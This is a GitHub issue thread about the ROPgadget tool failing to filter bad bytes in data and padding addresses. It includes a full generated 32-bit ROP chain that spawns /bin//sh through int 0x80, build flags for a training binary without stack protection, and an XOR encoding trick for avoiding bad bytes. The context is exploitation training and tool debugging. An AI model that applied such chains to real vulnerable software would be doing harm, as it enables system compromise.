ROPgadget seemingly not respecting badbytes in data and padding addresses

[patricia-gallardo]

I am not very experienced using this tool, but I have an example in one of my trainings and I can't seem to get it to work.

So rename this to target.cpp (github is not a fan of uploading C++ files it seems) target.txt

Build it like this (added pthread and static to make the binary bigger):

g++ -ggdb3 -m32 -static -pthread -fno-stack-protector -o target target.cpp

Then try to generate a ropchain with these badbytes:

ROPgadget --ropchain --binary target --badbytes "20|00|09|0b"

Generated chain

p += pack('<I', 0x0804a6e0) # pop esi ; ret
p += pack('<I', 0x08209060) # @ .data
p += pack('<I', 0x080f76aa) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x080ac1d0) # mov dword ptr [esi], eax ; pop ebx ; pop esi ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0804a6e0) # pop esi ; ret
p += pack('<I', 0x08209064) # @ .data + 4
p += pack('<I', 0x080f76aa) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x080ac1d0) # mov dword ptr [esi], eax ; pop ebx ; pop esi ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0804a6e0) # pop esi ; ret
p += pack('<I', 0x08209068) # @ .data + 8
p += pack('<I', 0x08056794) # xor eax, eax ; ret
p += pack('<I', 0x080ac1d0) # mov dword ptr [esi], eax ; pop ebx ; pop esi ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08049022) # pop ebx ; ret
p += pack('<I', 0x08209060) # @ .data
p += pack('<I', 0x080c0105) # pop ecx ; ret
p += pack('<I', 0x08209068) # @ .data + 8
p += pack('<I', 0x08129249) # pop edx ; pop ebx ; ret
p += pack('<I', 0x08209068) # @ .data + 8
p += pack('<I', 0x08209060) # padding without overwrite ebx
p += pack('<I', 0x08056794) # xor eax, eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x0815916e) # inc eax ; ret
p += pack('<I', 0x080f63eb) # int 0x80

Which has 0x20 bytes present in addresses that are used for data and padding.

Please let me know if this is just me using it wrong, I would love to get this working.

Thank you so much!

[SweetVishnya]

Yeah, bad bytes in data is a real problem. You may try more advanced ROP chaining tools. However, I don't know any existing open source ROP compiler that handles bad bytes in data. We actually wrote a paper that specifically handles bad bytes in data [1]. Unfortunately, it's closed source.

[1] https://arxiv.org/abs/2111.05781

[JonathanSalwan]

Maybe you can start with the rop chain generated by the tool and then update it manually to avoid bad bytes? For example, maybe you can use some gadgets that encode 0x08209064 with bitwise operators (e.g: xor, etc.).

[SweetVishnya]

@JonathanSalwan, that sounds like a great task for training)

[JonathanSalwan]

Actually I was thinking about something like below but you are right, sounds fun for a training :).

hex(0x19318175 ^  0x11111111) = 0x8209064

pop reg1 ; ret
0x19318175
pop reg2 ; ret
0x11111111
xor reg1, reg2 ; ret

[JonathanSalwan]

Btw, i'm pretty sure we can automate this, sounds a good challenge :D